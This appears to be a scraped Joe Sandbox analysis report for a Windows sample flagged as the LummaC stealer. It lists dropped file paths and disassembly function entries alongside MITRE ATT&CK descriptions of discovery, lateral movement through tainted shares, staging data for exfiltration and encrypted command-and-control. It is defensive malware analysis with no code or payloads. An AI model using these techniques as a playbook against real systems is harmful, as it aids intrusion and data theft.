Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report current[1].exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_current[1].exe_9b5737f5faee579b493102f3d6aa2427c2a8d_78bff3be_07a493f7-7c08-4e63-830e-5d8ecd9668e0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_jJEAWO.exe_2bd22f57251f20d34b755a755d907fabae7c39b_c18945cf_77b172d6-41a2-4dd7-bb1f-84845737eb17\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CEF.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D7C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DAC.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9B3.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB0C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB2C.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Windows Analysis Report
current[1].exe

Function 00424A2F Relevance: 7.1, Strings: 5, Instructions: 842
COMMON

Function 004238A0 Relevance: 4.4, Strings: 3, Instructions: 644
COMMON

Function 0045EAE9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100
nativeCOMMON

Function 0045EFF5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
nativeCOMMON

Function 00462440 Relevance: 3.2, APIs: 2, Instructions: 180
nativememoryCOMMON

Function 00460A90 Relevance: 3.2, APIs: 2, Instructions: 167
nativememoryCOMMON

Function 0042E700 Relevance: 3.2, APIs: 2, Instructions: 156
nativememoryCOMMON

Function 00460870 Relevance: 3.2, APIs: 2, Instructions: 154
nativememoryCOMMON

Function 00462990 Relevance: 3.2, APIs: 2, Instructions: 154
nativememoryCOMMON

Function 0082F056 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre